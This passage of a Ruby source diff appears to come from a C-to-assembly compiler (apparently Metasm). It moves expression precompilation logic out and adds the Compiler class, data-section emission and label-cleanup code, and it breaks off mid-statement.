def precompile(compiler, scope) - @expr = CExpression.precompile_inner(compiler, scope, @expr) - @exprup = CExpression.precompile_inner(compiler, scope, @exprup) if exprup - super(compiler, scope) - end - end - - class Goto - def precompile(compiler, scope) - if not compiler.auto_label_list[@target] - @target = scope.nonauto_label[@target] ||= compiler.new_label(@target) - end - scope.statements << self - end - end - - class Asm - def precompile(compiler, scope) - scope.statements << self - # TODO CExpr.precompile_type(clobbers) - end - end - - class CExpression - def precompile(compiler, scope) - i = precompile_inner(compiler, scope, false) - scope.statements << i if i - end - - # changes obj.type to a precompiled type - # keeps struct/union, change everything else to __int\d - # except Arrays if declaration is true (need to know variable allocation sizes etc) - # returns the type - def self.precompile_type(compiler, scope, obj, declaration = false) - case t = obj.type.untypedef - when BaseType - case t.name - when :void - when :float, :double, :longdouble - else t = BaseType.new("__int#{compiler.typesize[t.name]*8}".to_sym, t.specifier) - end - when Array - if declaration; precompile_type(compiler, scope, t, declaration) - else t = BaseType.new("__int#{compiler.typesize[:ptr]*8}".to_sym, :unsigned) - end - when Pointer - if t.type.untypedef.kind_of? Function - precompile_type(compiler, scope, t, declaration) - else - t = BaseType.new("__int#{compiler.typesize[:ptr]*8}".to_sym, :unsigned) - end - when Enum; t = BaseType.new("__int#{compiler.typesize[:int]*8}".to_sym) - when Function - precompile_type(compiler, scope, t) - t.args ||= [] - t.args.each { |a| precompile_type(compiler, scope, a) } - when Union - if declaration and t.members and not t.name # anonymous struct - t.members.each { |a| precompile_type(compiler, scope, a, true) } - end - else raise 'bad type ' + t.inspect - end - (t.qualifier ||= []).concat obj.type.qualifier if obj.type.qualifier and t != obj.type - (t.attributes ||= []).concat obj.type.attributes if obj.type.attributes and t != obj.type - while obj.type.kind_of? TypeDef - obj.type = obj.type.type - (t.qualifier ||= []).concat obj.type.qualifier if obj.type.qualifier and t != obj.type - (t.attributes ||= []).concat obj.type.attributes if obj.type.attributes and t != obj.type - end - obj.type = t - end - - def self.precompile_inner(compiler, scope, expr, nested = true) - case expr - when CExpression; expr.precompile_inner(compiler, scope, nested) - else expr - end - end - - # returns a new CExpression with simplified self.type, computes structure offsets - # turns char[]/float immediates to reference to anonymised const - # TODO 'a = b += c' => 'b += c; a = b' (use nested argument) - # TODO handle precompile_inner return nil - # TODO struct.bits - def precompile_inner(compiler, scope, nested = true) - case @op - when :'.' - # a.b => (&a)->b - lexpr = CExpression.precompile_inner(compiler, scope, @lexpr) - ll = lexpr - ll = lexpr.rexpr while ll.kind_of? CExpression and not ll.op - if ll.kind_of? CExpression and ll.op == :'*' and not ll.lexpr - # do not change lexpr.rexpr.type directly to a pointer, might retrigger (ptr+imm) => (ptr + imm*sizeof(*ptr)) - @lexpr = CExpression.new(nil, nil, ll.rexpr, Pointer.new(lexpr.type)) - else - @lexpr = CExpression.new(nil, :'&', lexpr, Pointer.new(lexpr.type)) - end - @op = :'->' - precompile_inner(compiler, scope) - when :'->' - # a->b => *(a + off(b)) - struct = @lexpr.type.untypedef.type.untypedef - lexpr = CExpression.precompile_inner(compiler, scope, @lexpr) - @lexpr = nil - @op = nil - if struct.kind_of? Struct and (off = struct.offsetof(compiler, @rexpr)) != 0 - off = CExpression.new(nil, nil, off, BaseType.new(:int, :unsigned)) - @rexpr = CExpression.new(lexpr, :'+', off, lexpr.type) - # ensure the (ptr + value) is not expanded to (ptr + value * sizeof(*ptr)) - CExpression.precompile_type(compiler, scope, @rexpr) - else - # union or 1st struct member - @rexpr = lexpr - end - if @type.kind_of? Array # Array member type is already an address - else - @rexpr = CExpression.new(nil, :*, @rexpr, @rexpr.type) - end - precompile_inner(compiler, scope) - when :'[]' - rexpr = CExpression.precompile_inner(compiler, scope, @rexpr) - if rexpr.kind_of? CExpression and not rexpr.op and rexpr.rexpr == 0 - @rexpr = @lexpr - else - @rexpr = CExpression.new(@lexpr, :'+', rexpr, @lexpr.type) - end - @op = :'*' - @lexpr = nil - precompile_inner(compiler, scope) - when :'?:' - # cannot precompile in place, a conditionnal expression may have a coma: must turn into If - if @lexpr.kind_of? CExpression - @lexpr = @lexpr.precompile_inner(compiler, scope) - if not @lexpr.lexpr and not @lexpr.op and @lexpr.rexpr.kind_of? ::Numeric - if @lexpr.rexpr == 0 - e = @rexpr[1] - else - e = @rexpr[0] - end - e = CExpression.new(nil, nil, e, e.type) if not e.kind_of? CExpression - return e.precompile_inner(compiler, scope) - end - end - raise 'conditional in toplevel' if scope == compiler.toplevel # just in case - var = Variable.new - var.storage = :register - var.name = compiler.new_label('ternary') - var.type = @rexpr[0].type - CExpression.precompile_type(compiler, scope, var) - Declaration.new(var).precompile(compiler, scope) - If.new(@lexpr, CExpression.new(var, :'=', @rexpr[0], var.type), CExpression.new(var, :'=', @rexpr[1], var.type)).precompile(compiler, scope) - @lexpr = nil - @op = nil - @rexpr = var - precompile_inner(compiler, scope) - when :'&&' - if scope == compiler.toplevel - @lexpr = CExpression.precompile_inner(compiler, scope, @lexpr) - @rexpr = CExpression.precompile_inner(compiler, scope, @rexpr) - CExpression.precompile_type(compiler, scope, self) - self - else - var = Variable.new - var.storage = :register - var.name = compiler.new_label('and') - var.type = @type - CExpression.precompile_type(compiler, scope, var) - var.initializer = CExpression.new(nil, nil, 0, var.type) - Declaration.new(var).precompile(compiler, scope) - l = @lexpr.kind_of?(CExpression) ? @lexpr : CExpression.new(nil, nil, @lexpr, @lexpr.type) - r = @rexpr.kind_of?(CExpression) ? @rexpr : CExpression.new(nil, nil, @rexpr, @rexpr.type) - If.new(l, If.new(r, CExpression.new(var, :'=', CExpression.new(nil, nil, 1, var.type), var.type))).precompile(compiler, scope) - @lexpr = nil - @op = nil - @rexpr = var - precompile_inner(compiler, scope) - end - when :'||' - if scope == compiler.toplevel - @lexpr = CExpression.precompile_inner(compiler, scope, @lexpr) - @rexpr = CExpression.precompile_inner(compiler, scope, @rexpr) - CExpression.precompile_type(compiler, scope, self) - self - else - var = Variable.new - var.storage = :register - var.name = compiler.new_label('or') - var.type = @type - CExpression.precompile_type(compiler, scope, var) - var.initializer = CExpression.new(nil, nil, 1, var.type) - Declaration.new(var).precompile(compiler, scope) - l = @lexpr.kind_of?(CExpression) ? @lexpr : CExpression.new(nil, nil, @lexpr, @lexpr.type) - l = CExpression.new(nil, :'!', l, var.type) - r = @rexpr.kind_of?(CExpression) ? @rexpr : CExpression.new(nil, nil, @rexpr, @rexpr.type) - r = CExpression.new(nil, :'!', r, var.type) - If.new(l, If.new(r, CExpression.new(var, :'=', CExpression.new(nil, nil, 0, var.type), var.type))).precompile(compiler, scope) - @lexpr = nil - @op = nil - @rexpr = var - precompile_inner(compiler, scope) - end - when :funcall - if @lexpr.kind_of? Variable and @lexpr.type.kind_of? Function and @lexpr.attributes and @lexpr.attributes.include? 'inline' and @lexpr.initializer - # TODO check recursive call (direct or indirect) - raise 'inline varargs unsupported' if @lexpr.type.varargs - rtype = @lexpr.type.type.untypedef - if not rtype.kind_of? BaseType or rtype.name != :void - rval = Variable.new - rval.name = compiler.new_label('inline_return') - rval.type = @lexpr.type.type - Declaration.new(rval).precompile(compiler, scope) - end - inline_label = {} - locals = @lexpr.type.args.zip(@rexpr).inject({}) { |h, (fa, a)| - h.update fa => CExpression.new(nil, nil, a, fa.type).precompile_inner(compiler, scope) - } - copy_inline_ce = lambda { |ce| - case ce - when CExpression; CExpression.new(copy_inline_ce[ce.lexpr], ce.op, copy_inline_ce[ce.rexpr], ce.type) - when Variable; locals[ce] || ce - when ::Array; ce.map { |e_| copy_inline_ce[e_] } - else ce - end - } - copy_inline = lambda { |stmt, scp| - case stmt - when Block - b = Block.new(scp) - stmt.statements.each { |s| - s = copy_inline[s, b] - b.statements << s if s - } - b - when If; If.new(copy_inline_ce[stmt.test], copy_inline[stmt.bthen, scp]) # re-precompile ? - when Label; Label.new(inline_label[stmt.name] ||= compiler.new_label('inline_'+stmt.name)) - when Goto; Goto.new(inline_label[stmt.target] ||= compiler.new_label('inline_'+stmt.target)) - when Return; CExpression.new(rval, :'=', copy_inline_ce[stmt.value], rval.type).precompile_inner(compiler, scp) if stmt.value - when CExpression; copy_inline_ce[stmt] - when Declaration - nv = stmt.var.dup - if nv.type.kind_of? Array and nv.type.length.kind_of? CExpression - nv.type = Array.new(nv.type.type, copy_inline_ce[nv.type.length]) # XXX nested dynamic? - end - locals[stmt.var] = nv - scp.symbol[nv.name] = nv - Declaration.new(nv) - else raise 'unexpected inline statement ' + stmt.inspect - end - } - scope.statements << copy_inline[@lexpr.initializer, scope] # body already precompiled - CExpression.new(nil, nil, rval, rval.type).precompile_inner(compiler, scope) - elsif @type.kind_of? Struct - var = Variable.new - var.name = compiler.new_label('return_struct') - var.type = @type - Declaration.new(var).precompile(compiler, scope) - @rexpr.unshift CExpression.new(nil, :&, var, Pointer.new(var.type)) - - var2 = Variable.new - var2.name = compiler.new_label('return_struct_ptr') - var2.type = Pointer.new(@type) - var2.storage = :register - CExpression.precompile_type(compiler, scope, var2) - Declaration.new(var2).precompile(compiler, scope) - @type = var2.type - CExpression.new(var2, :'=', self, var2.type).precompile(compiler, scope) - - CExpression.new(nil, :'*', var2, var.type).precompile_inner(compiler, scope) - else - t = @lexpr.type.untypedef - t = t.type.untypedef if t.pointer? - @lexpr = CExpression.precompile_inner(compiler, scope, @lexpr) - types = t.args.map { |a| a.type } - # cast args to func prototype - @rexpr.map! { |e_| (types.empty? ? e_ : CExpression.new(nil, nil, e_, types.shift)).precompile_inner(compiler, scope) } - CExpression.precompile_type(compiler, scope, self) - self - end - when :',' - lexpr = @lexpr.kind_of?(CExpression) ? @lexpr : CExpression.new(nil, nil, @lexpr, @lexpr.type) - rexpr = @rexpr.kind_of?(CExpression) ? @rexpr : CExpression.new(nil, nil, @rexpr, @rexpr.type) - lexpr.precompile(compiler, scope) - rexpr.precompile_inner(compiler, scope) - when :'!' - CExpression.precompile_type(compiler, scope, self) - if @rexpr.kind_of?(CExpression) - case @rexpr.op - when :'<', :'>', :'<=', :'>=', :'==', :'!=' - @op = { :'<' => :'>=', :'>' => :'<=', :'<=' => :'>', :'>=' => :'<', - :'==' => :'!=', :'!=' => :'==' }[@rexpr.op] - @lexpr = @rexpr.lexpr - @rexpr = @rexpr.rexpr - precompile_inner(compiler, scope) - when :'&&', :'||' - @op = { :'&&' => :'||', :'||' => :'&&' }[@rexpr.op] - @lexpr = CExpression.new(nil, :'!', @rexpr.lexpr, @type) - @rexpr = CExpression.new(nil, :'!', @rexpr.rexpr, @type) - precompile_inner(compiler, scope) - when :'!' - if @rexpr.rexpr.kind_of? CExpression - @op = nil - @rexpr = @rexpr.rexpr - else - @op = :'!=' - @lexpr = @rexpr.rexpr - @rexpr = CExpression.new(nil, nil, 0, @lexpr.type) - end - precompile_inner(compiler, scope) - else - @rexpr = CExpression.precompile_inner(compiler, scope, @rexpr) - self - end - else - @rexpr = CExpression.precompile_inner(compiler, scope, @rexpr) - self - end - when :'++', :'--' - if not @rexpr - var = Variable.new - var.storage = :register - var.name = compiler.new_label('postincrement') - var.type = @type - Declaration.new(var).precompile(compiler, scope) - CExpression.new(var, :'=', @lexpr, @type).precompile(compiler, scope) - CExpression.new(nil, @op, @lexpr, @type).precompile(compiler, scope) - @lexpr = nil - @op = nil - @rexpr = var - precompile_inner(compiler, scope) - elsif @type.pointer? and compiler.sizeof(nil, @type.untypedef.type.untypedef) != 1 - # ++ptr => ptr += sizeof(*ptr) (done in += precompiler) - @op = { :'++' => :'+=', :'--' => :'-=' }[@op] - @lexpr = @rexpr - @rexpr = CExpression.new(nil, nil, 1, BaseType.new(:ptr, :unsigned)) - precompile_inner(compiler, scope) - else - CExpression.precompile_type(compiler, scope, self) - @rexpr = CExpression.precompile_inner(compiler, scope, @rexpr) - self - end - when :'=' - # handle structure assignment/array assignment - case @lexpr.type.untypedef - when Union - # rexpr may be a :funcall - @rexpr = CExpression.precompile_inner(compiler, scope, @rexpr) - @lexpr.type.untypedef.members.zip(@rexpr.type.untypedef.members) { |m1, m2| - # assume m1 and m2 are compatible - v1 = CExpression.new(@lexpr, :'.', m1.name, m1.type) - v2 = CExpression.new(@rexpr, :'.', m2.name, m1.type) - CExpression.new(v1, :'=', v2, v1.type).precompile(compiler, scope) - } - # (foo = bar).toto - @op = nil - @rexpr = @lexpr - @lexpr = nil - @type = @rexpr.type - precompile_inner(compiler, scope) if nested - when Array - if not len = @lexpr.type.untypedef.length - @rexpr = CExpression.precompile_inner(compiler, scope, @rexpr) - # char toto[] = "bla" - if @rexpr.kind_of? CExpression and not @rexpr.lexpr and not @rexpr.op and - @rexpr.rexpr.kind_of? Variable and @rexpr.rexpr.type.kind_of? Array - len = @rexpr.rexpr.type.length - end - end - raise 'array initializer with no length !' if not len - # TODO optimize... - len.times { |i| - i = CExpression.new(nil, nil, i, BaseType.new(:long, :unsigned)) - v1 = CExpression.new(@lexpr, :'[]', i, @lexpr.type.untypedef.type) - v2 = CExpression.new(@rexpr, :'[]', i, v1.type) - CExpression.new(v1, :'=', v2, v1.type).precompile(compiler, scope) - } - @op = nil - @rexpr = @lexpr - @lexpr = nil - @type = @rexpr.type - precompile_inner(compiler, scope) if nested - else - @lexpr = CExpression.precompile_inner(compiler, scope, @lexpr) - @rexpr = CExpression.precompile_inner(compiler, scope, @rexpr) - CExpression.precompile_type(compiler, scope, self) - self - end - when nil - case @rexpr - when Block - # compound statements - raise 'compound statement in toplevel' if scope == compiler.toplevel # just in case - var = Variable.new - var.storage = :register - var.name = compiler.new_label('compoundstatement') - var.type = @type - CExpression.precompile_type(compiler, scope, var) - Declaration.new(var).precompile(compiler, scope) - if @rexpr.statements.last.kind_of? CExpression - @rexpr.statements[-1] = CExpression.new(var, :'=', @rexpr.statements[-1], var.type) - @rexpr.precompile(compiler, scope) - end - @rexpr = var - precompile_inner(compiler, scope) - when ::String - # char[] immediate - v = Variable.new - v.storage = :static - v.name = 'char_' + @rexpr.tr('^a-zA-Z', '')[0, 8] - v.type = Array.new(@type.type) - v.type.length = @rexpr.length + 1 - v.type.type.qualifier = [:const] - v.initializer = CExpression.new(nil, nil, @rexpr, @type) - Declaration.new(v).precompile(compiler, scope) - @rexpr = v - precompile_inner(compiler, scope) - when ::Float - # float immediate - v = Variable.new - v.storage = :static - v.name = @type.untypedef.name.to_s - v.type = @type - v.type.qualifier = [:const] - v.initializer = CExpression.new(nil, nil, @rexpr, @type) - Declaration.new(v).precompile(compiler, scope) - @rexpr = CExpression.new(nil, :'*', v, v.type) - precompile_inner(compiler, scope) - when CExpression - # simplify casts - CExpression.precompile_type(compiler, scope, self) - # propagate type first so that __uint64 foo() { return -1 } => 0xffffffffffffffff - @rexpr.type = @type if @rexpr.kind_of? CExpression and @rexpr.op == :- and not @rexpr.lexpr and @type.kind_of? BaseType and @type.name == :__int64 # XXX kill me - @rexpr = @rexpr.precompile_inner(compiler, scope) - if @type.kind_of? BaseType and @rexpr.type.kind_of? BaseType - if @rexpr.type == @type - # noop cast - @lexpr, @op, @rexpr = @rexpr.lexpr, @rexpr.op, @rexpr.rexpr - elsif not @rexpr.op and @type.integral? and @rexpr.type.integral? - if @rexpr.rexpr.kind_of? ::Numeric and (val = reduce(compiler)).kind_of? ::Numeric - @rexpr = val - elsif compiler.typesize[@type.name] < compiler.typesize[@rexpr.type.name] - # (char)(short)(int)(long)foo => (char)foo - @rexpr = @rexpr.rexpr - end - end - end - self - else - CExpression.precompile_type(compiler, scope, self) - self - end - else - # int+ptr => ptr+int - if @op == :+ and @lexpr and @lexpr.type.integral? and @rexpr.type.pointer? - @rexpr, @lexpr = @lexpr, @rexpr - end - - # handle pointer + 2 == ((char *)pointer) + 2*sizeof(*pointer) - if @rexpr and [:'+', :'+=', :'-', :'-='].include? @op and - @type.pointer? and @rexpr.type.integral? - sz = compiler.sizeof(nil, @type.untypedef.type.untypedef) - if sz != 1 - sz = CExpression.new(nil, nil, sz, @rexpr.type) - @rexpr = CExpression.new(@rexpr, :'*', sz, @rexpr.type) - end - end - - # type promotion => cast - case @op - when :+, :-, :*, :/, :&, :|, :^, :% - if @lexpr - if @lexpr.type != @type - @lexpr = CExpression.new(nil, nil, @lexpr, @lexpr.type) if not @lexpr.kind_of? CExpression - @lexpr = CExpression.new(nil, nil, @lexpr, @type) - end - if @rexpr.type != @type - @rexpr = CExpression.new(nil, nil, @rexpr, @rexpr.type) if not @rexpr.kind_of? CExpression - @rexpr = CExpression.new(nil, nil, @rexpr, @type) - end - end - when :>>, :<< - # char => int - if @lexpr.type != @type - @lexpr = CExpression.new(nil, nil, @lexpr, @lexpr.type) if not @lexpr.kind_of? CExpression - @lexpr = CExpression.new(nil, nil, @lexpr, @type) - end - when :'+=', :'-=', :'*=', :'/=', :'&=', :'|=', :'^=', :'%=' - if @rexpr.type != @lexpr.type - @rexpr = CExpression.new(nil, nil, @rexpr, @rexpr.type) if not @rexpr.kind_of? CExpression - @rexpr = CExpression.new(nil, nil, @rexpr, @type) - end - end - - @lexpr = CExpression.precompile_inner(compiler, scope, @lexpr) - @rexpr = CExpression.precompile_inner(compiler, scope, @rexpr) - - if @op == :'&' and not @lexpr - rr = @rexpr - rr = rr.rexpr while rr.kind_of? CExpression and not rr.op - if rr.kind_of? CExpression and rr.op == :'*' and not rr.lexpr - @lexpr = nil - @op = nil - @rexpr = rr.rexpr - return precompile_inner(compiler, scope) - elsif rr != @rexpr - @rexpr = rr - return precompile_inner(compiler, scope) - end - end - - CExpression.precompile_type(compiler, scope, self) - - isnumeric = lambda { |e_| e_.kind_of?(::Numeric) or (e_.kind_of? CExpression and - not e_.lexpr and not e_.op and e_.rexpr.kind_of? ::Numeric) } - - # calc numeric - # XXX do not simplify operations involving variables (for type overflow etc) - if isnumeric[@rexpr] and (not @lexpr or isnumeric[@lexpr]) and (val = reduce(compiler)).kind_of? ::Numeric - @lexpr = nil - @op = nil - @rexpr = val - end - - self - end - end - end + class Parser + def precompile + @toplevel.precompile(Compiler.new(self)) + self + end + end + + # each CPU defines a subclass of this one + class Compiler + # an ExeFormat (mostly used for unique label creation) + attr_accessor :exeformat + # the C Parser (destroyed by compilation) + attr_accessor :parser + # an array of assembler statements (strings) + attr_accessor :source + # list of unique labels generated (to recognize user-defined ones) + attr_accessor :auto_label_list + + attr_accessor :curexpr + # allows 'raise self' (eg struct.offsetof) + def exception(msg='EOF unexpected') + ParseError.new "near #@curexpr: #{msg}" + end + + # creates a new CCompiler from an ExeFormat and a C Parser + def initialize(parser, exeformat=ExeFormat.new, source=[]) + @parser, @exeformat, @source = parser, exeformat, source + @auto_label_list = {} + end + + def new_label(base='') + lbl = @exeformat.new_label base + @auto_label_list[lbl] = true + lbl + end + + def toplevel ; @parser.toplevel end + def typesize ; @parser.typesize end + def sizeof(*a) @parser.sizeof(*a) end + + # compiles the c parser toplevel to assembler statements in self.source (::Array of ::String) + # + # starts by precompiling parser.toplevel (destructively): + # static symbols are converted to toplevel ones, as nested functions + # uses an ExeFormat (the argument) to create unique label/variable names + # + # remove typedefs/enums + # CExpressions: all expr types are converted to __int8/__int16/__int32/__int64 (sign kept) (incl. ptr), + void + # struct member dereference/array indexes are converted to *(ptr + off) + # coma are converted to 2 statements, ?: are converted to If + # :|| and :&& are converted to If + assignment to temporary + # immediate quotedstrings/floats are converted to references to const static toplevel + # postincrements are replaced by a temporary (XXX arglist) + # compound statements are unnested + # Asm are kept (TODO precompile clobber types) + # Declarations: initializers are converted to separate assignment CExpressions + # Blocks are kept unless empty + # structure dereferences/array indexing are converted to *(ptr + offset) + # While/For/DoWhile/Switch are converted to If/Goto + # Continue/Break are converted to Goto + # Cases are converted to Labels during Switch conversion + # Label statements are removed + # Return: 'return ;' => 'return ; goto ;', 'return;' => 'goto ;' + # If: 'if (a) b; else c;' => 'if (a) goto l1; { c; }; goto l2; l1: { b; } l2:' + # && and || in condition are expanded to multiple If + # functions returning struct are precompiled (in Declaration/CExpression/Return) + # + # in a second phase, unused labels are removed from functions, as noop goto (goto x; x:) + # dead code is removed ('goto foo; bar; baz:' => 'goto foo; baz:') (TODO) + # + # after that, toplevel is no longer valid C (bad types, blocks moved...) + # + # then toplevel statements are sorted (.text, .data, .rodata, .bss) and compiled into asm statements in self.source + # + # returns the asm source in a single string + def compile + cf = @exeformat.unique_labels_cache.keys & @auto_label_list.keys + raise "compile_c name conflict: #{cf.inspect}" if not cf.empty? + @exeformat.unique_labels_cache.update @auto_label_list + + @parser.toplevel.precompile(self) + + # reorder statements (arrays of Variables) following exe section typical order + funcs, rwdata, rodata, udata = [], [], [], [] + @parser.toplevel.statements.each { |st| + if st.kind_of? Asm + @source << st.body + next + end + raise 'non-declaration at toplevel! ' + st.inspect if not st.kind_of? Declaration + v = st.var + if v.type.kind_of? Function + funcs << v if v.initializer # no initializer == storage :extern + elsif v.storage == :extern + elsif v.initializer + if v.type.qualifier.to_a.include?(:const) or + (v.type.kind_of? Array and v.type.type.qualifier.to_a.include?(:const)) + rodata << v + else + rwdata << v + end + else + udata << v + end + } + + if not funcs.empty? + @exeformat.compile_setsection @source, '.text' + funcs.each { |func| c_function(func) } + c_program_epilog + end + + align = 1 + if not rwdata.empty? + @exeformat.compile_setsection @source, '.data' + rwdata.each { |data| align = c_idata(data, align) } + end + + if not rodata.empty? + @exeformat.compile_setsection @source, '.rodata' + rodata.each { |data| align = c_idata(data, align) } + end + + if not udata.empty? + @exeformat.compile_setsection @source, '.bss' + udata.each { |data| align = c_udata(data, align) } + end + + # needed to allow asm parser to use our autogenerated label names + @exeformat.unique_labels_cache.delete_if { |k, v| @auto_label_list[k] } + + @source.join("\n") + end + + # compiles a C function +func+ to asm source into the array of strings +str+ + # in a first pass the stack variable offsets are computed, + # then each statement is compiled in turn + def c_function(func) + # must wait the Declaration to run the CExpr for dynamic auto offsets, + # and must run those statements once only + # TODO alloc a stack variable to maintain the size for each dynamic array + # TODO offset of arguments + # TODO nested function + c_init_state(func) + + # hide the full @source while compiling, then add prolog/epilog (saves 1 pass) + @source << '' << "#{func.name}:" + presource, @source = @source, [] + + c_block(func.initializer) + + tmpsource, @source = @source, presource + c_prolog + @source.concat tmpsource + c_epilog + @source << '' + end + + def c_block(blk) + c_block_enter(blk) + blk.statements.each { |stmt| + case stmt + when CExpression; c_cexpr(stmt) + when Declaration; c_decl(stmt.var) + when If; c_ifgoto(stmt.test, stmt.bthen.target) + when Goto; c_goto(stmt.target) + when Label; c_label(stmt.name) + when Return; c_return(stmt.value) + when Asm; c_asm(stmt) + when Block; c_block(stmt) + else raise + end + } + c_block_exit(blk) + end + + def c_block_enter(blk) + end + + def c_block_exit(blk) + end + + def c_label(name) + @source << "#{name}:" + end + + # fills @state.offset (empty hash) + # automatic variable => stack offset, (recursive) + # offset is an ::Integer or a CExpression (dynamic array) + # assumes offset 0 is a ptr-size-aligned address + # TODO registerize automatic variables + def c_reserve_stack(block, off = 0) + block.statements.each { |stmt| + case stmt + when Declaration + next if stmt.var.type.kind_of? Function + off = c_reserve_stack_var(stmt.var, off) + @state.offset[stmt.var] = off + when Block + c_reserve_stack(stmt, off) + # do not update off, not nested subblocks can overlap + end + } + end + + # computes the new stack offset for var + # off is either an offset from stack start (:ptr-size-aligned) or + # a CExpression [[[expr, +, 7], &, -7], +, off] + def c_reserve_stack_var(var, off) + if (arr_type = var.type).kind_of? Array and (arr_sz = arr_type.length).kind_of? CExpression + # dynamic array ! + arr_sz = CExpression.new(arr_sz, :*, sizeof(nil, arr_type.type), + BaseType.new(:long, :unsigned)).precompile_inner(@parser, nil) + off = CExpression.new(arr_sz, :+, off, arr_sz.type) + off = CExpression.new(off, :+, 7, off.type) + off = CExpression.new(off, :&, -7, off.type) + CExpression.new(off, :+, 0, off.type) + else + al = var.type.align(@parser) + sz = sizeof(var) + case off + when CExpression; CExpression.new(off.lexpr, :+, ((off.rexpr + sz + al - 1) / al * al), off.type) + else (off + sz + al - 1) / al * al + end + end + end + + # here you can add thing like stubs for PIC code + def c_program_epilog + end + + # compiles a C static data definition into an asm string + # returns the new alignment value + def c_idata(data, align) + w = data.type.align(@parser) + @source << ".align #{align = w}" if w > align + + @source << data.name.dup + len = c_idata_inner(data.type, data.initializer) + len %= w + len == 0 ? w : len + end + + # dumps an anonymous variable definition, appending to the last line of source + # source.last is a label name or is empty before calling here + # return the length of the data written + def c_idata_inner(type, value) + case type + when BaseType + value ||= 0 + + if type.name == :void + @source.last << ':' if not @source.last.empty? + return 0 + end + + @source.last << + case type.name + when :__int8; ' db ' + when :__int16; ' dw ' + when :__int32; ' dd ' + when :__int64; ' dq ' + when :ptr; " d#{%w[x b w x d x x x q][@parser.typesize[type.name]]} " + when :float; ' db ' + [value].pack(@parser.endianness == :little ? 'e' : 'g').unpack('C*').join(', ') + ' // ' + when :double; ' db ' + [value].pack(@parser.endianness == :little ? 'E' : 'G').unpack('C*').join(', ') + ' // ' + when :longdouble; ' db ' + [value].pack(@parser.endianness == :little ? 'E' : 'G').unpack('C*').join(', ') + ' // ' # XXX same as :double + else raise "unknown idata type #{type.inspect} #{value.inspect}" + end + + @source.last << c_idata_inner_cexpr(value) + + @parser.typesize[type.name] + + when Struct + value ||= [] + @source.last << ':' if not @source.last.empty? + # could .align here, but if there is our label name just before, it should have been .aligned too.. + raise "unknown struct initializer #{value.inspect}" if not value.kind_of? ::Array + sz = 0 + type.members.zip(value).each { |m, v| + if m.name and wsz = type.offsetof(@parser, m.name) and sz < wsz + @source << "db #{wsz-sz} dup(?)" + end + @source << '' + flen = c_idata_inner(m.type, v) + sz += flen + } + + sz + + when Union + value ||= [] + @source.last << ':' if not @source.last.empty? + len = sizeof(nil, type) + raise "unknown union initializer #{value.inspect}" if not value.kind_of? ::Array + idx = value.rindex(value.compact.last) || 0 + raise "empty union initializer" if not idx + wlen = c_idata_inner(type.members[idx].type, value[idx]) + @source << "db #{'0' * (len - wlen) * ', '}" if wlen < len + + len + + when Array + value ||= [] + if value.kind_of? CExpression and not value.op and value.rexpr.kind_of? ::String + elen = sizeof(nil, value.type.type) + @source.last << + case elen + when 1; ' db ' + when 2; ' dw ' + else raise 'bad char* type ' + value.inspect + end << value.rexpr.inspect + + len = type.length || (value.rexpr.length+1) + if len > value.rexpr.length + @source.last << (', 0' * (len - value.rexpr.length)) + end + + elen * len + + elsif value.kind_of? ::Array + @source.last << ':' if not @source.last.empty? + len = type.length || value.length + value.each { |v| + @source << '' + c_idata_inner(type.type, v) + } + len -= value.length + if len > 0 + @source << " db #{len * sizeof(nil, type.type)} dup(0)" + end + + sizeof(nil, type.type) * len + + else raise "unknown static array initializer #{value.inspect}" + end + end + end + + def c_idata_inner_cexpr(expr) + expr = expr.reduce(@parser) if expr.kind_of? CExpression + case expr + when ::Integer; (expr >= 4096) ? ('0x%X' % expr) : expr.to_s + when ::Numeric; expr.to_s + when Variable + case expr.type + when Array; expr.name + else c_idata_inner_cexpr(expr.initializer) + end + when CExpression + if not expr.lexpr + case expr.op + when :& + case expr.rexpr + when Variable; expr.rexpr.name + else raise 'unhandled addrof in initializer ' + expr.rexpr.inspect + end + #when :* + when :+; c_idata_inner_cexpr(expr.rexpr) + when :-; ' -' << c_idata_inner_cexpr(expr.rexpr) + when nil + e = c_idata_inner_cexpr(expr.rexpr) + if expr.rexpr.kind_of? CExpression + e = '(' << e << " & 0#{'ff'*sizeof(expr)}h)" + end + e + else raise 'unhandled initializer expr ' + expr.inspect + end + else + case expr.op + when :+, :-, :*, :/, :%, :<<, :>>, :&, :|, :^ + e = '(' << c_idata_inner_cexpr(expr.lexpr) << + expr.op.to_s << c_idata_inner_cexpr(expr.rexpr) << ')' + if expr.type.integral? + # db are unsigned + e = '(' << e << " & 0#{'ff'*sizeof(expr)}h)" + end + e + #when :'.' + #when :'->' + #when :'[]' + else raise 'unhandled initializer expr ' + expr.inspect + end + end + else raise 'unhandled initializer ' + expr.inspect + end + end + + def c_udata(data, align) + @source << "#{data.name} " + @source.last << + case data.type + when BaseType + len = @parser.typesize[data.type.name] + case data.type.name + when :__int8; 'db ?' + when :__int16; 'dw ?' + when :__int32; 'dd ?' + when :__int64; 'dq ?' + else "db #{len} dup(?)" + end + else + len = sizeof(data) + "db #{len} dup(?)" + end + len %= align + len == 0 ? align : len + end + + def check_reserved_name(var) + end + end + + class Statement + # all Statements/Declaration must define a precompile(compiler, scope) method + # it must append itself to scope.statements + + # turns a statement into a new block + def precompile_make_block(scope) + b = Block.new scope + b.statements << self + b + end + end + + class Block + # precompile all statements, then simplifies symbols/structs types + def precompile(compiler, scope=nil) + stmts = @statements.dup + @statements.clear + stmts.each { |st| + compiler.curexpr = st + st.precompile(compiler, self) + } + + # cleanup declarations + @symbol.delete_if { |n, s| not s.kind_of? Variable } + @struct.delete_if { |n, s| not s.kind_of? Union } + @symbol.each_value { |var| + CExpression.precompile_type(compiler, self, var, true) + } + @struct.each_value { |var| + next if not var.members + var.members.each { |m| + CExpression.precompile_type(compiler, self, m, true) + } + } + scope.statements << self if scope and not @statements.empty? + end + + # removes unused labels, and in-place goto (goto toto; toto:) + def precompile_optimize + list = [] + precompile_optimize_inner(list, 1) + precompile_optimize_inner(list, 2) + end + + # step 1: list used labels/unused goto + # step 2: remove unused labels + def precompile_optimize_inner(list, step) + lastgoto = nil + hadref = false + walk = lambda { |expr| + next if not expr.kind_of? CExpression + # gcc's unary && support + if not expr.op and not expr.lexpr and expr.rexpr.kind_of? Label + list << expr.rexpr.name + else + walk[expr.lexpr] + if expr.rexpr.kind_of? ::Array + expr.rexpr.each { |r| walk[r] } + else + walk[expr.rexpr] + end + end + } + @statements.dup.each { |s| + lastgoto = nil if not s.kind_of? Label + case s + when Block + s.precompile_optimize_inner(list, step) + @statements.delete s if step == 2 and s.statements.empty? + when CExpression; walk[s] if step == 1 + when Label + case step + when 1 + if lastgoto and 